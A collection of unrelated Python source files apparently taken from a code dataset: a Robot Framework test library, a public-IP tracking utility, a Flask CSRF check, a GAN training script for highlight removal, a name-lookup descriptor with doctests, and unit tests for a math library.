sys.stderr.write("Usage:\n {} <config-path> <name-prefix> <tag>\n".format(sys.argv[0]))
sys.exit(1)
main(*sys.argv[1:])
| StarcoderdataPython |
1633335 | class RecLibrary1(object):
def keyword_only_in_library_1(self):
print "Keyword from library 1"
def keyword_in_both_libraries(self):
print "Keyword from library 1"
def keyword_in_all_resources_and_libraries(self):
print "Keyword from library 1"
def keyword_everywhere(self):
print "Keyword from library 1"
def no_operation(self):
print "Overrides keyword from BuiltIn library"
def similar_kw_3(self):
pass
def action(self):
pass
def do_action(self):
pass
def action_and_expect_problems(self):
pass
def action_and_ignore_problems(self):
pass
def wait_until_action_succeeds(self):
pass
def do_stuff(self):
pass
def open_application(self):
pass
def ask_user_for_input(self):
pass
def boot_up_server(self):
pass
def shut_down_server(self):
pass
def minimize_window(self):
pass
def maximize_window(self):
pass
def open_window(self):
pass
def create_data(self):
pass
def delete_data(self):
pass
def update_data(self):
pass
def modify_data(self):
pass
def get_data(self):
pass
def read_data(self):
pass
def record(self, message, level):
pass
def nothing(self):
pass
| StarcoderdataPython |
1783666 | import json
import requests
from time import sleep, time, ctime
import sys
import subprocess
import socket
def fuzzyLookup(key, word_list):
from difflib import SequenceMatcher as sm
max_ratio = 0.
best_match = ""
for ind in range(len(word_list)):
ratio = sm(None,key,word_list[ind]).ratio()
if ratio>max_ratio:
max_ratio = ratio
best_match = word_list[ind]
return best_match
class IPBank(object):
def __init__(self):
self.bank = []
self.file_name = None
def savedStates(self, device):
if type(device) is not str:
device = device.getName()
for saved_device in self.bank:
if device == saved_device.getName():
return saved_device
raise DynamipError(
"Could not find information of the following device: %s" % device)
def parseDict(self, dictionary):
list_devices = []
for name in dictionary.keys():
device = Device(name)
device.fromDict(dictionary[name])
list_devices.append(device)
self.bank = list_devices
def parseFile(self, file_name=None):
if file_name is None:
if self.file_name is None:
raise DynamipError("A file name should be specified")
else:
file_name = self.file_name
else:
self.file_name = file_name
with open(file_name, 'r') as file:
info = json.load(file)
self.parseDict(info)
return self.bank
def updateFile(self, device, file_name=None):
if file_name is None:
if self.file_name is None:
raise DynamipError("A file name should be specified")
else:
file_name = self.file_name
else:
self.file_name = file_name
info = device.toDict()
with touchOpen(file_name, 'r+') as file:
file_info = json.load(file)
file_info.update(info)
file.seek(0)
json.dump(file_info, file, sort_keys=True, indent=4)
file.truncate()
# self.parseDict(file_info)
def __str__(self):
text = [str(device) for device in self.bank]
return "\n-----\n".join(text)
class NetworkInterface(object):
def __init__(self):
self.ip = None
self.ip_gateway = None
self.interface_type = None # `public`, `wlan`, or `eth`
self.subnet_mask = None
self.mac_address = None
self.mac_address_gateway = None
self.ssh_port = None
self.tunneled = False
self.tunnel_request_recieved = False
self.tunneled_to = {'ip': '0.0.0.0', 'port': 22}
def fromFile(self, file_name):
self.ssh_port = 22 # TODO: correct this to read from file
class Device(object):
def __init__(self, name=None):
self.name = name
self.networks = []
self.ip_local = None
self.ip_public = None
self.port_forwarding = None
self.local_network = [{'type': None, 'ip': None}]
self.update_time = None
def getName(self):
return self.name
def fromDevice(self):
self.name = getHostname()
self.ip_public = getIP()
self.update_time = time()
self.up_loca = getLocalIP()
self.port_forwarding = None # look this up from config file
def lookup(self, key, dictionary):
# TODO: clean up this methods
try:
return dictionary[key]
except KeyError:
print(
'Could not find the key `%s`. Returning `None`.' % key)
return None
def fromDict(self, dictionary):
if self.name is None:
raise DynamipError(
"Device object needs a name associated with the device")
if self.name in dictionary.keys():
print(
"The dictionary provided to `Device.fromDict` seem to contain information of multiple devices!")
print("Narrowing the information to current device")
dictionary = dictionary[self.name]
self.ip_public = self.lookup('ip_public', dictionary)
self.update_time = self.lookup('update_time', dictionary)
def toDict(self):
information = {}
information[self.name] = {"ip_public": self.ip_public,
"update_time": self.update_time, "local_network": self.local_network}
return information
def isComplete(self):
if None in [self.name, self.ip_public, self.mtim]:
raise DynamipError(
"Device information is incomplete:%s" % str(self))
def __eq__(self, other):
equal = True
try:
equal &= self.name == other.name
equal &= self.ip_public == other.ip_public
equal &= self.ip_local == other.ip_local
return equal
except Exception as e:
print("Following error happened during comparing %s and %s: %s" %
(e, self.name, other.name))
return False
def __neq__(self, other):
equal = True
try:
equal &= self.name == other.name
equal &= self.ip_public == other.ip_public
equal &= self.ip_local == other.ip_local
return not equal
except Exception as e:
print("Following error happened during comparing %s and %s: %s" %
(e, self.name, other.name))
return True
def __str__(self):
text = ["Device name: %s" % self.name]
if self.update_time is not None:
text.append("- Updated @ %s" % ctime(self.update_time))
text.append("- Public IP: %s" % self.ip_public)
text.append("- Local Networks: %s" % self.local_network)
text = "\n".join(text)
return text
class DynamipError(Exception):
pass
def getBashOutput(command):
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
return process.communicate()[0].decode("utf-8").rstrip()
def getSSID():
command = "iwgetid -r"
return getBashOutput(command)
def gatewayMacAddress():
"""wip"""
command = "arping -f -I $(ip route show match 0/0 | awk '{print $5, $3}')"
return getBashOutput(command)
def getLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def ipFromIpify():
URL = 'https://api.ipify.org/?format=json'
response = requests.get(URL)
data = json.loads(response.text)
my_ip = data['ip']
return my_ip
def ipFromHttpbin():
URL = 'http://httpbin.org/ip'
response = requests.get(URL)
data = json.loads(response.text)
my_ip = data['origin']
return my_ip
def getIP():
try:
return ipFromIpify()
except:
print(sys.exc_info()[0])
try:
return ipFromHttpbin()
except:
print(sys.exc_info()[0])
return sys.exc_info()[0]
def getHostname():
import socket
return socket.gethostname()
def touchOpen(file_name, *args, **kwargs):
import os
fd = os.open(file_name, os.O_RDWR | os.O_CREAT)
# Encapsulate the low-level file descriptor in a python file object
return os.fdopen(fd, *args, **kwargs)
def writeIPToFile(file_name, hostname):
ip_current_public = getIP()
ip_current_local = getLocalIP()
with touchOpen(file_name, 'r+') as file:
try:
whole_data = json.load(file)
except ValueError:
whole_data = dict()
info = {'ip_public': ip_current_public, 'update_time': time()}
# info['local_networks']=getInterfaceList()
whole_data[hostname] = info
file.seek(0)
json.dump(whole_data, file, sort_keys=True, indent=4)
file.truncate()
def readIPFromFile(file_name, hostname):
with open(file_name, 'r') as ip_file:
info = json.load(ip_file)[hostname]
ip_public = info['ip_public']
# local_network = info['local_networks']
return ip_public, local_network
def getChangedIP(minutes=15):
my_ip = getIP()
while True:
sleep(minutes * 60)
try:
new_ip = getIP()
except:
raise
if my_ip != new_ip:
print('IP changed from', my_ip, 'to', new_ip)
break
return new_ip
if __name__ == '__main__':
# print(getHostname())
# print(getSSID(), getLocalIP())
# m = Device('qwer')
# print(m)
print(fuzzyLookup('methi',['something','nothing','somethingelse']))
| StarcoderdataPython |
3307077 | # -*- coding: utf-8 -*-
import binascii
import os
from flask import abort
from flask import request
from flask import session
def check_csrf_protection():
"""Make sure POST requests are sent with a CSRF token unless they're part of the API.
In the future we might want to think about a system where we can disable CSRF protection
on a per-view basis, maybe with a decorator.
"""
if request.method == 'POST':
token = session.pop('_csrf_token', None)
if not token or token != request.form.get('_csrf_token'):
abort(403)
def generate_csrf_token():
if '_csrf_token' not in session:
session['_csrf_token'] = binascii.hexlify(os.urandom(16))
return session['_csrf_token']
| StarcoderdataPython |
19025 | <reponame>lamas1901/telegram__pdf-bot
from ..utils import get_env_var
from pathlib import Path
BASE_DIR = Path(__file__).parent.parent
TG_TOKEN = get_env_var('TG_TOKEN')
YMONEY_TOKEN = get_env_var('YTOKEN')
PROMO_CODE = get_env_var('PROMO_CODE')
| StarcoderdataPython |
1643648 | from __future__ import print_function
import os
import datetime
import argparse
import itertools
from torch.utils.data import DataLoader
from torch.autograd import Variable
import torch
from utils import ReplayBuffer
from utils import LambdaLR
from utils import weights_init_normal
from utils import mask_generator_lab
from utils import QueueMask
from model_l import Generator_F2H, Generator_H2F, Discriminator
from datasets_l import ImageDataset
import sys
import matplotlib.pyplot as plt
import numpy as np
import scipy.io as io
def main(argv=None):
print(torch.cuda.is_available())
os.environ["CUDA_VISIBLE_DEVICES"] = "4"
# 用来解析命令行参数 首先声明一个parser
parser = argparse.ArgumentParser()
# 添加参数
parser.add_argument('--epoch', type=int, default=0, help='starting epoch')
parser.add_argument('--n_epochs', type=int, default=100, help='number of epochs of training')
parser.add_argument('--batchSize', type=int, default=1, help='size of the batches')
parser.add_argument('--lr', type=float, default=0.0002, help='initial learning rate')
parser.add_argument('--decay_epoch', type=int, default=50,
help='epoch to start linearly decaying the learning rate to 0')
parser.add_argument('--size', type=int, default=400, help='size of the data crop (squared assumed)')
parser.add_argument('--input_nc', type=int, default=1, help='number of channels of input data')
parser.add_argument('--output_nc', type=int, default=1, help='number of channels of output data')
parser.add_argument('--cuda', action='store_false', help='use GPU computation')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
parser.add_argument('--snapshot_epochs', type=int, default=2, help='number of epochs of training')
parser.add_argument('--iter_loss', type=int, default=100, help='average loss for n iterations')
# 读取命令行参数
opt = parser.parse_args()
opt.dataroot = 'SHIQ_data'
if not os.path.exists('model_l'):
os.mkdir('model_l')
# os.path.join() 将路径名和文件合成一个路径
opt.log_path = os.path.join('model_l', str('log') + '.txt')
if torch.cuda.is_available():
opt.cuda = True
###### Definition of variables ######
# Networks
netG_A2B = Generator_H2F(opt.input_nc, opt.output_nc) # highlight to highlight_free
netG_B2A = Generator_F2H(opt.output_nc, opt.input_nc) # highlight_free to highlight
netD_A = Discriminator(opt.input_nc)
netD_B = Discriminator(opt.output_nc)
if opt.cuda:
netG_A2B.cuda()
netG_B2A.cuda()
netD_A.cuda()
netD_B.cuda()
# 使用apply初始化网络权值参数,apply函数会递归地搜索网络内所有module,并把参数表示的函数应用到所有module上
netG_A2B.apply(weights_init_normal)
netG_B2A.apply(weights_init_normal)
netD_A.apply(weights_init_normal)
netD_B.apply(weights_init_normal)
# Lossess
criterion_GAN = torch.nn.MSELoss() # lsgan
criterion_cycle = torch.nn.L1Loss()
criterion_identity = torch.nn.L1Loss()
# Optimizers & LR schedulers
optimizer_G = torch.optim.Adam(itertools.chain(netG_A2B.parameters(), netG_B2A.parameters()),
lr=opt.lr, betas=(0.5, 0.999))
optimizer_D_A = torch.optim.Adam(netD_A.parameters(), lr=opt.lr, betas=(0.5, 0.999))
optimizer_D_B = torch.optim.Adam(netD_B.parameters(), lr=opt.lr, betas=(0.5, 0.999))
lr_scheduler_G = torch.optim.lr_scheduler.LambdaLR(optimizer_G,
lr_lambda=LambdaLR(opt.n_epochs, opt.epoch,
opt.decay_epoch).step)
lr_scheduler_D_A = torch.optim.lr_scheduler.LambdaLR(optimizer_D_A,
lr_lambda=LambdaLR(opt.n_epochs, opt.epoch,
opt.decay_epoch).step)
lr_scheduler_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer_D_B,
lr_lambda=LambdaLR(opt.n_epochs, opt.epoch,
opt.decay_epoch).step)
# Inputs & targets memory allocation
Tensor = torch.cuda.FloatTensor if opt.cuda else torch.Tensor
input_A = Tensor(opt.batchSize, opt.input_nc, opt.size, opt.size)
input_B = Tensor(opt.batchSize, opt.output_nc, opt.size, opt.size)
input_C = Tensor(opt.batchSize, opt.output_nc,opt.size, opt.size)
target_real = Variable(Tensor(opt.batchSize).fill_(1.0), requires_grad=False)
target_fake = Variable(Tensor(opt.batchSize).fill_(0.0), requires_grad=False)
mask_non_highlight = Variable(Tensor(opt.batchSize, 1, opt.size, opt.size).fill_(-1.0),
requires_grad=False) # -1.0 non-highlight
fake_A_buffer = ReplayBuffer()
fake_B_buffer = ReplayBuffer()
# Dataset loader
dataloader = DataLoader(ImageDataset(opt.dataroot, unaligned=True),
batch_size=opt.batchSize, shuffle=True, num_workers=opt.n_cpu)
curr_iter = 0
G_losses_temp = 0
D_A_losses_temp = 0
D_B_losses_temp = 0
G_losses = []
D_A_losses = []
D_B_losses = []
mask_queue = QueueMask(dataloader.__len__() / 4)
open(opt.log_path, 'w').write(str(opt) + '\n\n')
###### Training ######
for epoch in range(opt.epoch, opt.n_epochs):
for i, batch in enumerate(dataloader):
# Set model input
real_A = Variable(input_A.copy_(batch['A']))
real_B = Variable(input_B.copy_(batch['B']))
mask_real = Variable(input_C.copy_(batch['C']))
###### Generators A2B and B2A ######
optimizer_G.zero_grad()
# Identity loss
# G_A2B(B) should equal B if real B is fed
same_B = netG_A2B(real_B,mask_non_highlight)
loss_identity_B = criterion_identity(same_B, real_B) * 5.0 # ||Gb(b)-b||1
# G_B2A(A) should equal A if real A is fed, so the mask should be all zeros
same_A = netG_B2A(real_A, mask_non_highlight)
loss_identity_A = criterion_identity(same_A, real_A) * 5.0 # ||Ga(a)-a||1
# GAN loss
fake_B = netG_A2B(real_A,mask_real)
pred_fake = netD_B(fake_B)
loss_GAN_A2B = criterion_GAN(pred_fake, target_real) # log(Db(Gb(a)))
mask = mask_real
mask_queue.insert(mask)
mask_random = mask_queue.rand_item()
fake_A = netG_B2A(real_B, mask_random)
pred_fake = netD_A(fake_A)
loss_GAN_B2A = criterion_GAN(pred_fake, target_real) # log(Da(Ga(b)))
# Cycle loss
recovered_A = netG_B2A(fake_B, mask_queue.last_item()) # real highlight, false highlight free
loss_cycle_ABA = criterion_cycle(recovered_A, real_A) * 10.0 # ||Ga(Gb(a))-a||1
recovered_B = netG_A2B(fake_A,mask_random)
loss_cycle_BAB = criterion_cycle(recovered_B, real_B) * 10.0 # ||Gb(Ga(b))-b||1
# Total loss
loss_G = loss_identity_A + loss_identity_B + loss_GAN_A2B + loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB
loss_G.backward()
# G_losses.append(loss_G.item())
G_losses_temp += loss_G.item()
optimizer_G.step()
###################################
###### Discriminator A ######
optimizer_D_A.zero_grad()
# Real loss
pred_real = netD_A(real_A)
loss_D_real = criterion_GAN(pred_real, target_real) # log(Da(a))
# Fake loss
fake_A = fake_A_buffer.push_and_pop(fake_A)
pred_fake = netD_A(fake_A.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake) # log(1-Da(G(b)))
# Total loss
loss_D_A = (loss_D_real + loss_D_fake) * 0.5
loss_D_A.backward()
# D_A_losses.append(loss_D_A.item())
D_A_losses_temp += loss_D_A.item()
optimizer_D_A.step()
###################################
###### Discriminator B ######
optimizer_D_B.zero_grad()
# Real loss
pred_real = netD_B(real_B)
loss_D_real = criterion_GAN(pred_real, target_real) # log(Db(b))
# Fake loss
fake_B = fake_B_buffer.push_and_pop(fake_B)
pred_fake = netD_B(fake_B.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake) # log(1-Db(G(a)))
# Total loss
loss_D_B = (loss_D_real + loss_D_fake) * 0.5
loss_D_B.backward()
# D_B_losses.append(loss_D_B.item())
D_B_losses_temp += loss_D_B.item()
optimizer_D_B.step()
###################################
curr_iter += 1
if (i + 1) % iter_loss == 0:
log = 'Epoch: %d, [iter %d], [loss_G %.5f], [loss_G_identity %.5f], [loss_G_GAN %.5f],' \
'[loss_G_cycle %.5f], [loss_D %.5f]' % \
(epoch, curr_iter, loss_G, (loss_identity_A + loss_identity_B), (loss_GAN_A2B + loss_GAN_B2A),
(loss_cycle_ABA + loss_cycle_BAB), (loss_D_A + loss_D_B))
print(log)
open(log_path, 'a').write(log + '\n')
G_losses.append(G_losses_temp / iter_loss)
D_A_losses.append(D_A_losses_temp / iter_loss)
D_B_losses.append(D_B_losses_temp / iter_loss)
G_losses_temp = 0
D_A_losses_temp = 0
D_B_losses_temp = 0
avg_log = '[the last %d iters], [loss_G %.5f], [D_A_losses %.5f], [D_B_losses %.5f],' \
% (iter_loss, G_losses[G_losses.__len__() - 1], D_A_losses[D_A_losses.__len__() - 1], \
D_B_losses[D_B_losses.__len__() - 1])
print(avg_log)
open(log_path, 'a').write(avg_log + '\n')
# Update learning rates
lr_scheduler_G.step()
lr_scheduler_D_A.step()
lr_scheduler_D_B.step()
# Save models checkpoints
torch.save(netG_A2B.state_dict(), 'model_l/netG_A2B.pth')
torch.save(netG_B2A.state_dict(), 'model_l/netG_B2A.pth')
torch.save(netD_A.state_dict(), 'model_l/netD_A.pth')
torch.save(netD_B.state_dict(), 'model_l/netD_B.pth')
if (epoch + 1) % snapshot_epochs == 0:
torch.save(netG_A2B.state_dict(), ('model_l/netG_A2B_%d.pth' % (epoch + 1)))
torch.save(netG_B2A.state_dict(), ('model_l/netG_B2A_%d.pth' % (epoch + 1)))
torch.save(netD_A.state_dict(), ('model_l/netD_A_%d.pth' % (epoch + 1)))
torch.save(netD_B.state_dict(), ('model_l/netD_B_%d.pth' % (epoch + 1)))
print('Epoch:{}'.format(epoch))
if __name__ == '__main__':
sys.exit(main())
| StarcoderdataPython |
4825780 | <filename>mtoolbox/autoname.py
# -*- coding: utf-8 -*-
"""Access an object's name as a property
Autoname is a data-descriptor, which automatically looks up the
name under which the object on which the descriptor is accessed
is known by.
Import the descriptor using ``from mtoolbox.autoname import Autoname``.
Example:
>>> class Object(object):
... name = Autoname()
>>> obj1 = Object()
>>> obj1.name
'obj1'
>>> obj2 = Object()
>>> obj2.name
'obj2'
By default Autoname will return the outer-most name that was defined
for the object:
>>> class Object(object):
... name = Autoname()
>>> def func(anobject):
... return anobject.name
>>> o = Object()
>>> func(o)
'o'
You can change this behaviour by using the 'inner' keyword:
>>> class Object(object):
... name = Autoname(inner=True)
>>> o = Object()
>>> def func(anobject):
... return anobject.name
>>> func(o)
'anobject'
Note:
Please be aware, that getting the inner-most name, is not what you
want in most cases:
>>> class Object(object):
... name = Autoname(inner=True)
... def printname(self):
... print(self.name)
>>> o = Object()
>>> o.printname()
self
When in automatic mode (see the class documentation below) the
descriptor will always return a name, that is in some callframe
dictionary. If you delete a name, it will use another one, that
is still in use:
>>> class Object(object):
... name = Autoname()
>>> o = Object()
>>> o.name
'o'
>>> g = o
>>> del o
>>> g.name
'g'
This can be helped a bit by using the 'bind' keyword argument and
calling <object>.name with the name that should be used first:
>>> class Object(object):
... name = Autoname(bind=True)
>>> o = Object()
>>> o.name
'o'
>>> g = o
>>> del o
>>> g.name
'o'
Warning:
Defining multiple names for an object in the same call frame (which is
easily said the same level of indention in your program) will
cause undetermined behaviour, depending on the Python interpreter:
>>> class Object(object):
... name = Autoname()
>>> o = Object()
>>> g = o
>>> o.name in ['o', 'g']
True
"""
import doctest
import inspect
class Autoname(object):
"""Create a new Autoname descriptor
Args:
initval (str, bool, None): The initial name
inner (bool): Return the inner-most name of the object (or not)
bind (bool): Bind the descriptor to the first name it returns
Returns:
Autoname: An Autoname instance
"""
def __init__(self, initval=True, inner=False, bind=False):
self.val = None
self.inner = inner
self.bind = bind
self.__set__(None, initval)
def __get__(self, theobject, objtype):
"""Return the name of theobject or None
Returns:
str or None: the name of the object
Usage:
>>> class Object(object):
... name = Autoname()
>>> obj = Object()
>>> obj.name
'obj'
>>> obj.name = 'another name'
>>> obj.name
'another name'
"""
if isinstance(self.val, str):
return self.val
elif self.val is False or self.val is None:
return None
else:
# If we really didn't find a name, we return None
thename = None
# There is at least one frame in the callstack, in which
# the calling object is a local variable, so we climb up
# the callstack, to find the name of the object.
for count, frametuple in enumerate(inspect.stack()):
# skip the first frame - this is our __get__
if count == 0:
continue
for name, obj in frametuple[0].f_locals.items():
# found a name, but keep searching in order to get
# the outer-most name unless inner == True
if obj is theobject:
thename = name
if self.inner:
self.__bind_if_wanted(thename)
return thename
self.__bind_if_wanted(thename)
return thename
def __bind_if_wanted(self, name):
if self.bind:
self.__set__(None, name)
def __set__(self, theobject, val):
"""Set the name of the theobject
Args:
theobject (object): The object to which's class
the descriptor is attached to
val (str, bool or None): Sets the name to depending on the type:
str sets the name to this str.
False or None sets the name to None.
True sets the name to automatically lookup.
Returns:
None
Raises:
TypeError if type(val) is invalid
Usage:
>>> class Object(object):
... name = Autoname()
>>> o = Object()
>>> o.name = 'k'
>>> o.name
'k'
>>> o.name = True
>>> o.name
'o'
>>> o.name = False
>>> str(o.name)
'None'
>>> o.name = 4
Traceback (most recent call last):
...
TypeError: Autoname must be set to str, bool, NoneType
"""
types = (str, bool, type(None))
if not isinstance(val, types):
raise TypeError("Autoname must be set to %s" % ", ".join(
[t.__name__ for t in types]))
self.val = val
if __name__ == '__main__':
doctest.testmod()
| StarcoderdataPython |
1693803 | <gh_stars>0
import unittest
import yammpy
NAN = float('nan')
INF = float('inf')
NINF = float('-inf')
class YammpyTests(unittest.TestCase):
def testConstants(self):
self.assertEqual(yammpy.pi, 3.141592653589793238462643)
self.assertEqual(yammpy.e, 2.718281828459045235360287)
self.assertEqual(yammpy.tau, 2*yammpy.pi)
self.assertEqual(yammpy.phi, 1.61803398874989484820)
self.assertEqual(yammpy.wal, 2.09455148154232659148)
def testAcos(self):
self.assertEqual(yammpy.acos(-1), yammpy.pi)
self.assertEqual(yammpy.acos(0), yammpy.pi/2)
self.assertEqual(yammpy.acos(1), 0)
def testAcosh(self):
self.assertEqual(yammpy.acosh(1), 0)
self.assertEqual(yammpy.acosh(2), 1.3169578969248166)
self.assertEqual(yammpy.acosh(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.acosh(NAN)))
def testAsin(self):
self.assertEqual(yammpy.asin(-1), -yammpy.pi/2)
self.assertEqual(yammpy.asin(0), 0)
self.assertEqual(yammpy.asin(1), yammpy.pi/2)
self.assertTrue(yammpy.isnan(yammpy.asin(NAN)))
def testAsinh(self):
self.assertEqual(yammpy.asinh(0), 0)
self.assertEqual(yammpy.asinh(1), 0.88137358701954305)
self.assertEqual(yammpy.asinh(-1), -0.88137358701954305)
self.assertEqual(yammpy.asinh(INF), INF)
self.assertEqual(yammpy.asinh(NINF), NINF)
self.assertTrue(yammpy.isnan(yammpy.asinh(NAN)))
def testAtan(self):
self.assertEqual(yammpy.atan(-1), -yammpy.pi/4)
self.assertEqual(yammpy.atan(0), 0)
self.assertEqual(yammpy.atan(1), yammpy.pi/4)
self.assertEqual(yammpy.atan(INF), yammpy.pi/2)
self.assertEqual(yammpy.atan(NINF), -yammpy.pi/2)
self.assertTrue(yammpy.isnan(yammpy.atan(NAN)))
def testAtanh(self):
self.assertEqual(yammpy.atanh(0), 0)
self.assertEqual(yammpy.atanh(0.5), 0.54930614433405489)
self.assertEqual(yammpy.atanh(-0.5), -0.54930614433405489)
self.assertTrue(yammpy.isnan(yammpy.atanh(NAN)))
def testCbrt(self):
self.assertEqual(yammpy.cbrt(0), 0)
self.assertEqual(yammpy.cbrt(1), 1)
self.assertEqual(yammpy.cbrt(27), 3)
self.assertEqual(yammpy.cbrt(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.cbrt(NAN)))
self.assertEqual(yammpy.cbrt(15625), 25)
def testCeil(self):
# self.assertEqual(int, type(yammpy.ceil(0.5)))
self.assertEqual(yammpy.ceil(0.5), 1)
self.assertEqual(yammpy.ceil(1.0), 1)
self.assertEqual(yammpy.ceil(1.5), 2)
self.assertEqual(yammpy.ceil(-0.5), 0)
self.assertEqual(yammpy.ceil(-1.0), -1)
self.assertEqual(yammpy.ceil(-1.5), -1)
self.assertEqual(yammpy.ceil(0.0), 0)
self.assertEqual(yammpy.ceil(-0.0), 0)
def testCos(self):
self.assertEqual(yammpy.cos(0), 1)
self.assertEqual(yammpy.cos(yammpy.pi), -1)
self.assertTrue(yammpy.isnan(yammpy.cos(NAN)))
def testCosh(self):
self.assertEqual(yammpy.cosh(0), 1)
self.assertEqual(yammpy.cosh(2)-2*yammpy.cosh(1)**2, -1)
self.assertEqual(yammpy.cosh(INF), INF)
self.assertEqual(yammpy.cosh(NINF), INF)
self.assertTrue(yammpy.isnan(yammpy.cosh(NAN)))
def testErf(self):
self.assertEqual(yammpy.erf(-0), -0.000000)
self.assertEqual(yammpy.erf(INF), 1.000000)
def testErfc(self):
self.assertEqual(yammpy.erfc(NINF), 2.000000)
self.assertEqual(yammpy.erfc(INF), 0.000000)
def testExp(self):
self.assertEqual(yammpy.exp(-1), 1/yammpy.e)
self.assertEqual(yammpy.exp(0), 1)
self.assertEqual(yammpy.exp(1), yammpy.e)
self.assertEqual(yammpy.exp(INF), INF)
self.assertEqual(yammpy.exp(NINF), 0.)
self.assertTrue(yammpy.isnan(yammpy.exp(NAN)))
def testExp2(self):
self.assertEqual(yammpy.exp2(5), 32.000000)
self.assertEqual(yammpy.exp2(0.5), 1.4142135623730951)
self.assertEqual(yammpy.exp2(-4), 0.062500)
self.assertEqual(yammpy.exp2(-0.9), 0.5358867312681466)
self.assertEqual(yammpy.exp2(NINF), 0.000000)
self.assertEqual(yammpy.exp2(1024), INF)
def testExmp1(self):
self.assertEqual(yammpy.expm1(1), 1.718281828459045)
self.assertEqual(yammpy.expm1(-0), -0.000000)
self.assertEqual(yammpy.expm1(NINF), -1.000000)
self.assertEqual(yammpy.expm1(710), INF)
def testFabs(self):
self.assertEqual(yammpy.fabs(-1), 1)
self.assertEqual(yammpy.fabs(0), 0)
self.assertEqual(yammpy.fabs(1), 1)
def testFloor(self):
# self.assertEqual(int, type(yammpy.floor(0.5)))
self.assertEqual(yammpy.floor(0.5), 0)
self.assertEqual(yammpy.floor(1.0), 1)
self.assertEqual(yammpy.floor(1.5), 1)
self.assertEqual(yammpy.floor(-0.5), -1)
self.assertEqual(yammpy.floor(-1.0), -1)
self.assertEqual(yammpy.floor(-1.5), -2)
def testGamma(self):
self.assertEqual(yammpy.gamma(10), 362880.00000000006)
self.assertEqual(yammpy.gamma(0.5), 1.772453850905516)
self.assertEqual(yammpy.gamma(INF), INF)
def testLgamma(self):
self.assertEqual(yammpy.lgamma(10), 12.801827480081469)
self.assertEqual(yammpy.lgamma(0.5), 0.5723649429247001)
self.assertEqual(yammpy.lgamma(1), 0)
self.assertEqual(yammpy.lgamma(INF), INF)
self.assertEqual(yammpy.lgamma(0), INF)
def testLog(self):
self.assertEqual(yammpy.log(1/yammpy.e), -1)
self.assertEqual(yammpy.log(1), 0)
self.assertEqual(yammpy.log(yammpy.e), 1)
self.assertEqual(yammpy.log(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.log(NAN)))
def testLog2(self):
self.assertEqual(yammpy.log2(1), 0.0)
self.assertEqual(yammpy.log2(2), 1.0)
self.assertEqual(yammpy.log2(4), 2.0)
self.assertEqual(yammpy.log2(2**1023), 1023.0)
self.assertTrue(yammpy.isnan(yammpy.log2(NAN)))
def testLog10(self):
self.assertEqual(yammpy.log10(0.1), -1)
self.assertEqual(yammpy.log10(1), 0)
self.assertEqual(yammpy.log10(10), 1)
self.assertEqual(yammpy.log(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.log10(NAN)))
def testLog1p(self):
for n in [2, 2**90, 2**300]:
self.assertAlmostEqual(yammpy.log1p(n), yammpy.log1p(float(n)))
self.assertEqual(yammpy.log1p(INF), INF)
def testLogb(self):
self.assertEqual(yammpy.logb(0), -INF)
def testNearbyint(self):
self.assertEqual(yammpy.nearbyint(2.3), 2.0)
self.assertEqual(yammpy.nearbyint(-2.3), -2.0)
self.assertEqual(yammpy.nearbyint(2.5), 2.0)
self.assertEqual(yammpy.nearbyint(INF), INF)
def testSin(self):
self.assertEqual(yammpy.sin(0), 0)
self.assertEqual(yammpy.sin(yammpy.pi/2), 1)
self.assertEqual(yammpy.sin(-yammpy.pi/2), -1)
self.assertTrue(yammpy.isnan(yammpy.sin(NAN)))
def testSinh(self):
self.assertAlmostEqual(yammpy.sinh(0), 0)
self.assertAlmostEqual(yammpy.sinh(1)**2-yammpy.cosh(1)**2, -1)
self.assertAlmostEqual(yammpy.sinh(1)+yammpy.sinh(-1), 0)
self.assertAlmostEqual(yammpy.sinh(INF), INF)
self.assertAlmostEqual(yammpy.sinh(NINF), NINF)
self.assertTrue(yammpy.isnan(yammpy.sinh(NAN)))
def testTan(self):
self.assertAlmostEqual(yammpy.tan(0), 0)
self.assertAlmostEqual(yammpy.tan(yammpy.pi/4), 1)
self.assertAlmostEqual(yammpy.tan(-yammpy.pi/4), -1)
self.assertTrue(yammpy.isnan(yammpy.tan(NAN)))
def testTanh(self):
self.assertEqual(yammpy.tanh(0), 0)
self.assertEqual(yammpy.tanh(INF), 1)
self.assertEqual(yammpy.tanh(NINF), -1)
self.assertTrue(yammpy.isnan(yammpy.tanh(NAN)))
def testTrunc(self):
self.assertEqual(yammpy.trunc(1), 1)
self.assertEqual(yammpy.trunc(-1), -1)
# self.assertEqual(type(yammpy.trunc(1)), int)
# self.assertEqual(type(yammpy.trunc(1.5)), int)
self.assertEqual(yammpy.trunc(1.5), 1)
self.assertEqual(yammpy.trunc(-1.5), -1)
self.assertEqual(yammpy.trunc(1.999999), 1)
self.assertEqual(yammpy.trunc(-1.999999), -1)
self.assertEqual(yammpy.trunc(-0.999999), -0)
self.assertEqual(yammpy.trunc(-100.999), -100)
def testAtan2(self):
self.assertEqual(yammpy.atan2(-1, 0), -yammpy.pi/2)
self.assertEqual(yammpy.atan2(-1, 1), -yammpy.pi/4)
self.assertEqual(yammpy.atan2(0, 1), 0)
self.assertEqual(yammpy.atan2(1, 1), yammpy.pi/4)
self.assertEqual(yammpy.atan2(1, 0), yammpy.pi/2)
self.assertEqual(yammpy.atan2(0., NINF), yammpy.pi)
self.assertEqual(yammpy.atan2(0., -2.3), yammpy.pi)
self.assertEqual(yammpy.atan2(0., -0.), yammpy.pi)
self.assertEqual(yammpy.atan2(0., 0.), 0.)
self.assertEqual(yammpy.atan2(0., 2.3), 0.)
self.assertEqual(yammpy.atan2(0., INF), 0.)
def testCopysign(self):
self.assertEqual(yammpy.copysign(1, 42), 1.0)
self.assertEqual(yammpy.copysign(0., 42), 0.0)
self.assertEqual(yammpy.copysign(1., -42), -1.0)
self.assertEqual(yammpy.copysign(3, 0.), 3.0)
self.assertEqual(yammpy.copysign(4., -0.), -4.0)
